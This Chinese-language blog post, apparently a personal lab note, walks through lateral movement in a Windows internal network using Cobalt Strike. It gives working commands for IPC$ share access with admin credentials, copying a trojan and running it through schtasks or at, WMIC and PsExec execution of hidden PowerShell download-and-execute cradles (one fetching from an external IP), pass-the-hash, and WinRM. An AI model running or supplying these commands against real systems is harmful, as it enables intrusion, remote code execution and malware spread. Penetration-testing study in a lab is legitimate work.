List

  1. 环境介绍
  2. IPC && 计划任务
  3. WMIC
  4. PsExec
  5. WinRM

前言

针对于内网渗透个人理解为信息收集(内部网段的扫描、端口服务、操作系统、补丁更新、域机器及重要业务机器定位、杀毒软件、防火墙策略、密码的规则、内部敏感文档等)然后根据获取到的信息来绘画出内部的网络结构和内网脆弱点从而进行横向渗透。

本篇文章记载了当拿到内网机器的密码或Hash进行横向移动的方式。

0x1 环境介绍

1.1 扩展图

01751-0mu34xwe3fc.png

1.2 网络环境

Windows 7 跳版机(192.168.200.222、10.211.66.5)双网卡可出网也可与内网连通。
Windows server 2012 目标靶机(192.168.200.66)不可出网。

1.3 简述

攻击者通过渗透测试拿到主机Win 7(192.168.200.222)的权限并发现可出网,所以上线CS用来权限维持。

56447-cubmumamn6.png

前提我们已经抓取到Win 7(192.168.200.222)跳板机的登陆明文凭证,这里是我添加的明文凭证,窃取凭证的方法有很多这里不在赘述参考文章,此篇文章只记录个人在学习内网环境下横向移动的一些笔记。

38260-qrmn57s6te.png

49541-8h3nl17keuu.png

添加一个 Win 7(192.168.200.222)跳板机的监听器用来做中转会话。

88652-iiepxs7iqkd.png

66001-yxhkew22nw.png

生成木马文件在本地。

93682-m5pw9h7n7d.png

Tips:因为Win 2012(192.168.200.66)目标机不出外网所以选择刚添加的中转会话。


0x2 IPC$ && 计划任务

2.1 利用条件

1)没有禁用IPC$连接、139和445端口、未使用防火墙等方式来阻止IPC$。
2)目标机器开启了相关的IPC$服务。
3)需要目标机器的管理员账号和密码(IPC$空连接除外)。
4)需要得知目标机器IP地址并可互相通信。

2.2 利用方式

在 CS 客户端对Win 7(192.168.200.222)会话进行操作。

对 Win 2012(192.168.200.66)目标主机建立共享连接,并查看目标主机共享资源。

beacon> shell net use \\192.168.200.66 /user:administrator "Hacker@1."
beacon> shell net view \\192.168.200.66

15079-9f2u21jyuu.png

列出目标主机 C 盘下目录文件。

beacon> shell dir \\192.168.200.66\C$

36895-6kwatkyfzlk.png

将CS木马上传到跳板机。

beacon> upload /root/demo.exe (C:\Users\ppbibo\AppData\Local\Temp\demo.exe)

将Win 7(192.168.200.222)跳板机的木马文件copy到Win 2012(192.168.200.66)目标机的C共享盘下。

beacon> shell copy C:\Users\ppbibo\AppData\Local\Temp\demo.exe \\192.168.200.66\C$

47188-mvicum41ufq.png

01049-tlbirw16m4n.png

远程创建Win 2012(192.168.200.66)目标机计划任务执行木马文件。

beacon> shell schtasks /create /s 192.168.200.66 /u administrator /p "Hacker@1." /sc MINUTE /mo 1 /tn test /tr "C:\\demo.exe"

88952-8899utqtgfn.png

由于 at 在windows server 2012等新版系统中已被弃用,所以需要使用 schtasks 命令代替。

84855-gzc8bvk9z8s.png

如果目标机器支持 at 命令,参考如下。

net time \\192.168.200.66
at \\192.168.200.66 11:05 c:\demo.exe

成功上线,该会话为被动连接,不操作的不会回连,如果中转机会话断掉,该会话也会断掉。

44036-qotxyo29frp.png

2.3 IPC 相关的命令

开放/关闭 ipc$ 共享。

net share ipc$
net share ipc$ /del

共享计算机 C 盘。

net share C=c:\

查看/删除共享的资源。

net share
net share C /del

取消IPC远程连接。

net use * /del /y

0x3 WMI

WMI(Windows Management Instrumentation,Windows管理规范)是一项核心的Windows管理技术;用户可以使用WMI管理本地和远程计算机。

3.1 利用条件

1)启动WMI服务(默认开启)。
2)开放135端口。

3.2 利用方式

在 CS 客户端对Win 7(192.168.200.222)会话进行操作。

使用CS生成一个WEB交互式Payload(Scripted Web Delivery)来实现无文件落地上线。

56167-pf5o8puny3k.png

生成的 Payload。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.100.233.99:7799/a'))"

在CS 客户端执行 wmic 远程命令。

Tips:因为目标主机不出网所以需要把 http://39.100.233.99:7799/a 上的payload,复制下来并在跳板机开启WEB服务,使受害机下载并执行跳板机上的Payload,上线CS。

跳板机安装了 python 运行如下命令快速开启WEB服务。

beacon> shell python -m SimpleHTTPServer 8080
beacon> shell wmic /node:192.168.200.66/user:administrator /password:Hacker@1. process call create "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.200.222:8080/payload.txt'))"

15953-b8w0ncoyklm.png

23647-5vofgsjirtk.png

成功上线。

在 windows server 2012 验证。

60234-osdd8fgmvqp.png

Tips:wmic命令缺点无回显,但是可借助其他脚本(wmiexec.vbs)来实现回显功能。


0x4 PsExec

PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。

41253-9rkk7d6qsji.png

beacon> shell psexec.exe \\192.168.200.66 -u Administrator -p Hacker@1. whoami

72104-4hu4bb858z4.png

beacon> shell psexec.exe \\192.168.200.66 -u Administrator -p Hacker@1. powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.200.222:8080/payload.txt'))

09847-mgziy5cxzo.png

Tips:psexec 传递命令时不要添加双引号否则会爆 “系统找不到指定的文件” 的错误。

Psexec下载地址
更多参考

4.1 CS Psexec_psh hash传递

凭证窃取中并不是每次都可以获取到明文,会出现只有hash的情况,获取hash同样可以进行横向操作。

因为换了WiFi地址所有IP发生了如下变化。

Windows 7 跳版机(172.16.100.176、10.211.66.5)双网卡可出网也可与内网连通。
Windows server 2012 目标靶机(172.16.100.60)不可出网。

52325-uc9k1o427aa.png

52788-tvr2sxfrwho.png

09599-qp8gcnf1zmi.png

75238-mwtx4p54gyp.png

成功上线。


0x5 WinRM

WinRM 指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口5985(HTTP)&5986 (HTTPS),在2012及以后默认开启。

这里的目标靶机正好是 windows server 2012,运行如下命令查看是否启用了 winrm service 。

winrm enumerate winrm/config/listener

61644-xbn0jzhc61m.png

5.1 利用方式

CS自带了一些用于横向移动的功能,可以在目标中选中主机进行攻击。

38562-i305jz59c5p.png

56882-4ommzwtkaxe.png

01290-7w2y6dhxom9.png

成功上线。


标签: 内网渗透

添加新评论

marisa.png